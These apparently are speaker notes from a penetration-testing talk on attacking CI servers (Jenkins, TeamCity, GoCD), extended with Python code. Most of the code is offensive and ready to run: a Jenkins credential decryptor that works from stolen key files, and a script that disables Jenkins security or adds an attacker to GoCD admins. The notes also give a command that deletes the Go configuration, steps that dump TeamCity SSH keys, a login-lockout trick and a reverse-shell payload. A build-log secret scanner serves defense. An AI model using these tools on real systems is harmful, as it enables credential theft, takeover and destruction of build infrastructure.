More about Continuous Integration: http://www.martinfowler.com/articles/continuousintegration.html





* Hudson was not evaluated separately. Most of what applies to Jenkins should apply to Hudson as well.

http://www.labofapenetrationtester.com/2014/08/script-execution-and-privilegeesc-jenkins.html

A user's right to add or change a build configuration is managed with Matrix-based security or the Project-based Matrix Authorization Strategy: https://wiki.jenkins-ci.org/display/jenkins/matrix-based+security Once a user can add a build step, the commands in that step run with the privileges of the Jenkins process on the machine executing the build. On a Windows machine we can leverage PowerShell from such a build step to execute advanced scripts.

The Jenkins service must be restarted after the security setting in config.xml is changed. During the tests, I was unable to restart the Jenkins service from a build step even on Windows (with SYSTEM privileges). The workaround is to have an interactive reverse shell on the host machine and restart the Jenkins service from there. Jenkins documentation on disabling security: https://wiki.jenkins-ci.org/display/jenkins/disable+security

Taken from http://thiébaud.fr/jenkins_credentials.html

We need credentials.xml from $JENKINS_HOME, and master.key and hudson.util.Secret from $JENKINS_HOME/secrets/. We read master.key and hudson.util.Secret as raw bytes (hudson.util.Secret is an encrypted binary blob, not text) and convert them back into files on our own machine, where the decryption is done offline. On a Windows machine the conversion can be done with TextToExe.ps1 from Nishang: https://github.com/samratashok/nishang/blob/master/utility/texttoexe.ps1
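The offline decryption itself, as an added example that is not part of the original deck and not the thiébaud.fr script it cites. It reproduces the key derivation Jenkins uses in hudson.util.Secret and DefaultConfidentialStore (AES-128 key = SHA-256 of master.key, hudson.util.Secret decrypted with AES-ECB and checked for the "::::MAGIC::::" suffix, first 16 bytes of the result used as the credential key) and decrypts the legacy ECB format the slide describes. It also handles the newer Jenkins 2.x "{...}" AES-CBC payload, which goes beyond what the deck covers. It assumes the Python "cryptography" package; the master.key, hudson.util.Secret and credentials.xml it uses when run without arguments are constructed in the script so that it runs offline, and the usernames and passwords in them are made up.

```python
"""Decrypt Jenkins credentials.xml offline from master.key + hudson.util.Secret.

Key derivation (hudson.util.Secret / DefaultConfidentialStore):
  aes_master = SHA-256(master.key text)[:16]
  blob       = AES-ECB-decrypt(aes_master, secrets/hudson.util.Secret)   # PKCS#5 padded
             = <256 random bytes> + "::::MAGIC::::"
  cred_key   = blob[:16]
Secret formats in credentials.xml:
  legacy            : base64(AES-ECB(cred_key, plaintext + MAGIC))
  v1 (Jenkins 2.x)  : "{" base64(0x01 | ivlen | datalen | iv | AES-CBC(cred_key, plaintext)) "}"
Usage on a real copy:  python3 jenkins_decrypt.py /path/to/JENKINS_HOME
Without arguments a constructed sample JENKINS_HOME is decrypted instead.
"""
import base64
import hashlib
import os
import re
import struct
import sys
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

MAGIC = b"::::MAGIC::::"


def _aes(key, mode, data, decrypt):
    """Raw AES-128; Java's Cipher.getInstance("AES") means ECB with PKCS5 padding."""
    ctx = Cipher(algorithms.AES(key), mode)
    op = ctx.decryptor() if decrypt else ctx.encryptor()
    return op.update(data) + op.finalize()


def _pad(data):
    n = 16 - len(data) % 16
    return data + bytes([n]) * n


def _unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= 16 or data[-n:] != bytes([n]) * n:
        raise ValueError("bad PKCS#5 padding: wrong key or corrupt file")
    return data[:-n]


def master_aes_key(master_key_text):
    """master.key holds a hex string; Jenkins hashes the text, not the decoded bytes."""
    return hashlib.sha256(master_key_text.strip()).digest()[:16]


def credentials_key(master_key_text, hudson_util_secret):
    blob = _unpad(_aes(master_aes_key(master_key_text), modes.ECB(), hudson_util_secret, True))
    if not blob.endswith(MAGIC):
        raise ValueError("magic suffix missing: wrong master.key?")
    return blob[:16]


def decrypt_secret(cred_key, encoded):
    if encoded.startswith("{") and encoded.endswith("}"):      # v1 payload
        payload = base64.b64decode(encoded[1:-1])
        if payload[0] != 1:
            raise ValueError("unknown payload version %d" % payload[0])
        iv_len, data_len = struct.unpack(">II", payload[1:9])
        iv = payload[9:9 + iv_len]
        ct = payload[9 + iv_len:9 + iv_len + data_len]
        return _unpad(_aes(cred_key, modes.CBC(iv), ct, True)).decode("utf-8")
    plain = _unpad(_aes(cred_key, modes.ECB(), base64.b64decode(encoded), True))  # legacy
    if not plain.endswith(MAGIC):
        raise ValueError("magic suffix missing: wrong key?")
    return plain[:-len(MAGIC)].decode("utf-8")


def dump_credentials(master_key_text, hudson_util_secret, credentials_xml):
    """Return [(tag, plaintext)] for every encrypted field found in credentials.xml."""
    key = credentials_key(master_key_text, hudson_util_secret)
    fields = re.findall(r"<(password|passphrase|privateKey|secret)>(.*?)</\1>", credentials_xml, re.S)
    return [(tag, decrypt_secret(key, value.strip())) for tag, value in fields]


# --- constructed sample JENKINS_HOME (encryption side, used only for the offline demo) ---
def encrypt_legacy(cred_key, plaintext):
    return base64.b64encode(_aes(cred_key, modes.ECB(), _pad(plaintext.encode() + MAGIC), False)).decode()


def encrypt_v1(cred_key, plaintext):
    iv = os.urandom(16)
    ct = _aes(cred_key, modes.CBC(iv), _pad(plaintext.encode()), False)
    return "{" + base64.b64encode(b"\x01" + struct.pack(">II", len(iv), len(ct)) + iv + ct).decode() + "}"


def build_sample_home():
    master_key = os.urandom(128).hex().encode()      # master.key: hex text, as Jenkins writes it
    raw = os.urandom(256)                             # Jenkins keeps 256 random bytes in the Secret
    hudson_util_secret = _aes(master_aes_key(master_key), modes.ECB(), _pad(raw + MAGIC), False)
    key = raw[:16]
    xml = ("<credentials>\n  <username>deploy</username>\n  <password>%s</password>\n"
           "  <username>svc-git</username>\n  <password>%s</password>\n</credentials>\n"
           % (encrypt_legacy(key, "Sup3rS3cret!"), encrypt_v1(key, "hunter2")))
    return master_key, hudson_util_secret, xml


if __name__ == "__main__":
    if len(sys.argv) == 2:
        home = sys.argv[1]
        with open(os.path.join(home, "secrets", "master.key"), "rb") as f:
            mk = f.read()
        with open(os.path.join(home, "secrets", "hudson.util.Secret"), "rb") as f:
            hs = f.read()
        with open(os.path.join(home, "credentials.xml"), "rb") as f:
            cx = f.read().decode("utf-8")
    else:
        mk, hs, cx = build_sample_home()
    for tag, value in dump_credentials(mk, hs, cx):
        print("%s: %s" % (tag, value))
```

The MAGIC check is the practical test that the right master.key was copied: with the wrong key the padding or the suffix check fails instead of silently returning garbage. Note that hudson.util.Secret must be copied byte for byte; a text-mode transfer that changes a single byte makes every credential undecryptable.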


https://confluence.jetbrains.com/display/tcd9/getting+started

https://confluence.jetbrains.com/pages/viewpage.action?pageid=54334889#howto...-teamcitysecuritynotes


https://confluence.jetbrains.com/display/tcd9/role+and+permission The TeamCity documentation recommends not running a build agent on the same machine as the TeamCity server (the "master"), but it looks like few installations follow that advice.

A build step can be added by a Project Administrator, or by an even lower role if permissions are configured that way. PowerShell commands and scripts can be executed using the PowerShell runner: https://confluence.jetbrains.com/display/tcd9/powershell On *nix agents, shell commands and scripts can be executed the same way.

https://confluence.jetbrains.com/display/tcd9/super+user Fun fact: you can lock out the SuperUser account for one minute by clicking the Log in button five times without entering a username and password. Repeating such login requests indefinitely keeps it blocked.


https://confluence.jetbrains.com/display/tcd9/ssh+keys+management Here is how it could be done:
1. To find the data directory of the server, look for "Data Directory" in teamcity-server.log. Use a PowerShell runner for the following command.
2. Run cat <TeamCity Data Directory>\config\projects\<project>\pluginData\ssh_keys\* to print the contents of all the keys (cat is the PowerShell alias for Get-Content).


TeamCity supports a Password type parameter for passwords (its value is masked in the UI and in build logs), but I have seen many users use a Text parameter for passwords instead. See: https://confluence.jetbrains.com/display/tcd9/typed+parameters


A couple of examples of credentials in build logs. In both of the above screenshots, the public instances and their build logs were accessed with Guest privileges.
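Finding such leaks in a log (or checking your own before you expose build logs to guests) can be automated. The scanner below is an added example, not code from the deck. Its sample log is constructed to resemble a TeamCity build log in which one password came from a Password parameter (masked as ******) and another from a Text parameter (printed in the clear); real TeamCity output differs in detail, and the pattern list is a starting point rather than a complete secret-detection ruleset.

```python
"""Scan a CI build log for credentials that leaked into it.

Usage on a real log:  python3 scan_build_log.py < build.log
Without stdin input the constructed SAMPLE_LOG below is scanned.
"""
import re
import sys

# (name, pattern); each pattern captures the secret in the group 'secret'
PATTERNS = [
    ("basic-auth in URL", re.compile(r"://[^/\s:@]+:(?P<secret>[^@\s]+)@")),
    ("curl -u user:pass", re.compile(r"(?:-u|--user)\s+[^\s:]+:(?P<secret>\S+)")),
    ("password-like assignment", re.compile(
        r"(?i)(?:password|passwd|pwd|pass|secret|token)['\"]?\s*[=:]\s*['\"]?(?P<secret>[^'\"\s]+)")),
    ("AWS access key id", re.compile(r"(?P<secret>\bAKIA[0-9A-Z]{16}\b)")),
    ("private key material", re.compile(r"(?P<secret>-----BEGIN [A-Z ]*PRIVATE KEY-----)")),
]
MASK = re.compile(r"^\*+$")   # TeamCity prints Password-parameter values as asterisks

# Constructed sample: line 2 used a Password parameter, line 3 a Text parameter.
SAMPLE_LOG = """\
[10:02:11] Step 1/2: Package (Command Line)
[10:02:12]   Setting parameter 'env.DB_PASSWORD' = '******'
[10:02:13]   Setting parameter 'env.ARTIFACT_PASS' = 'Sup3rS3cret!'
[10:02:14] Step 2/2: Deploy (PowerShell)
[10:02:15]   curl -u deploy:Sup3rS3cret! https://artifacts.example.internal/upload
[10:02:16]   git clone https://svc-git:ghp_abc123XYZ@git.example.internal/app.git
[10:02:17]   aws configure set aws_access_key_id AKIAIOSFODNN7EXAMPLE
[10:02:18] Build finished
"""


def scan(lines):
    """Return [(line_no, kind, secret)] for every hit whose value is not already masked."""
    hits = []
    for no, line in enumerate(lines, 1):
        for kind, pat in PATTERNS:
            for m in pat.finditer(line):
                secret = m.group("secret")
                if MASK.match(secret):
                    continue
                hits.append((no, kind, secret))
    return hits


def redact(line):
    """Replace every detected secret with asterisks, e.g. before shipping logs elsewhere."""
    for _, pat in PATTERNS:
        line = pat.sub(lambda m: m.group(0).replace(m.group("secret"), "*" * 8), line)
    return line


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines() if sys.stdin.isatty() else sys.stdin.read().splitlines()
    for no, kind, secret in scan(lines):
        print("line %d: %s -> %s" % (no, kind, secret))
```

The masked value on line 2 is what a Password parameter looks like in the log; the same value on line 3 is what a Text parameter looks like, and it is the second case the scanner reports. Because scan() skips values that are all asterisks, running it over the output of redact() returns nothing, which is a convenient self-check for the redaction.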


http://www.go.cd/ http://www.thoughtworks.com/products/go-continuous-delivery

http://support.thoughtworks.com/entries/22299328-go-security-questions


http://support.thoughtworks.com/entries/22873043-go-s-custom-command http://www.go.cd/documentation/user/current/advanced_usage/command_repository.html

We need Pipeline Group Administrator rights to configure jobs that run custom commands.


In the screenshot above, the command cmd /c powershell -c del 'C:\Program Files (x86)\Go Server\config\cruise-config.xml' removes the configuration file of Go, and the command cmd /c powershell -c Restart-Service 'Go Server' restarts the Go Server service. After this, all security is gone from the Go dashboard and anyone who knows the URL has admin rights. Deleting the whole file also destroys every pipeline definition, which is noisy; instead of removing cruise-config.xml we can remove only its <security></security> section and restart the Go Server service for the same effect, or add the current user to <admins> inside the <security> section of cruise-config.xml.
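The config-file edits described above for Go, together with the Jenkins counterpart mentioned earlier (setting <useSecurity> to false in $JENKINS_HOME/config.xml, the change that needs the Jenkins service restart), as an added example that is not part of the original deck. The two XML documents it operates on are constructed minimal files in the shape of config.xml and cruise-config.xml; real files carry many more elements. Both servers read their configuration only at startup, so the service restart described above is still required after the edited file is written back.

```python
"""Edit a CI server's on-disk configuration to disable or take over its security.

  jenkins_disable_security(xml)   -> <useSecurity>false</useSecurity> in config.xml
  gocd_add_admin(xml, user)       -> <user> appended to <server><security><admins>
  gocd_remove_security(xml)       -> <security> element dropped from cruise-config.xml
Write the returned text back with an XML declaration, e.g.
  ET.ElementTree(ET.fromstring(text.encode())).write(path, xml_declaration=True, encoding="UTF-8")
and then restart the service.
"""
import xml.etree.ElementTree as ET

# Keep the 'xsi:' prefix on output; Go validates cruise-config.xml against its XSD on start.
ET.register_namespace("xsi", "http://www.w3.org/2001/XMLSchema-instance")

# Constructed sample files (not copied from a real installation).
JENKINS_CONFIG = """<?xml version='1.0' encoding='UTF-8'?>
<hudson>
  <version>1.609</version>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:admin</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm"/>
</hudson>
"""

CRUISE_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<cruise xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:noNamespaceSchemaLocation="cruise-config.xsd" schemaVersion="75">
  <server artifactsdir="artifacts">
    <security>
      <passwordFile path="/etc/go/passwd"/>
      <admins>
        <user>admin</user>
      </admins>
    </security>
  </server>
  <pipelines group="deploy"/>
</cruise>
"""


def _parse(xml_text):
    # Parse bytes so the encoding declaration in the prolog is honoured.
    return ET.fromstring(xml_text.encode("utf-8"))


def _dump(root):
    return ET.tostring(root, encoding="unicode")


def jenkins_security_enabled(config_xml):
    flag = _parse(config_xml).find("useSecurity")
    return flag is not None and (flag.text or "").strip().lower() == "true"


def jenkins_disable_security(config_xml):
    root = _parse(config_xml)
    flag = root.find("useSecurity")
    if flag is None:
        flag = ET.SubElement(root, "useSecurity")
    flag.text = "false"
    return _dump(root)


def gocd_admins(cruise_xml):
    return [u.text for u in _parse(cruise_xml).findall("server/security/admins/user")]


def gocd_add_admin(cruise_xml, username):
    root = _parse(cruise_xml)
    server = root.find("server")
    security = server.find("security")
    if security is None:                       # no <security> at all: create it
        security = ET.SubElement(server, "security")
    admins = security.find("admins")
    if admins is None:
        admins = ET.SubElement(security, "admins")
    if username not in [u.text for u in admins.findall("user")]:
        ET.SubElement(admins, "user").text = username
    return _dump(root)


def gocd_remove_security(cruise_xml):
    root = _parse(cruise_xml)
    server = root.find("server")
    security = server.find("security")
    if security is not None:
        server.remove(security)
    return _dump(root)


if __name__ == "__main__":
    print(jenkins_disable_security(JENKINS_CONFIG))
    print(gocd_add_admin(CRUISE_CONFIG, "builder"))
```

Adding a user to <admins> is the quieter option: the pipelines keep working and the file still validates, whereas removing <security> changes the dashboard for everyone. On the defensive side the same parsers make a useful integrity check: alert when <useSecurity> flips or when the admin list in cruise-config.xml changes outside a change-management window. Newer Jenkins releases no longer allow security to be switched off with this flag at all; there the authorizationStrategy element would have to be changed instead.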


Documentation on using password files: http://www.go.cd/documentation/user/current/configuration/dev_authentication.html https://github.com/gocd/gocd/blob/master/manualtesting/ant_hg/password.properties Location of the Go Server's SSH keys: on Windows under C:/Program Files (x86)/Go Server/ (%HOMEDRIVE%%HOMEPATH%/.ssh of the account running the service); on Linux /var/go/.ssh


Documentation for the exec builder: http://cruisecontrol.sourceforge.net/main/configxml.html#exec


Also see: https://github.com/foxglovesec/javaunserializeexploits https://github.com/frohoff/ysoserial

I am using an encoded one-line PowerShell reverse shell from Nishang as the payload in the above screenshot (https://github.com/samratashok/nishang/blob/master/shells/Invoke-PowerShellTcpOneLine.ps1).
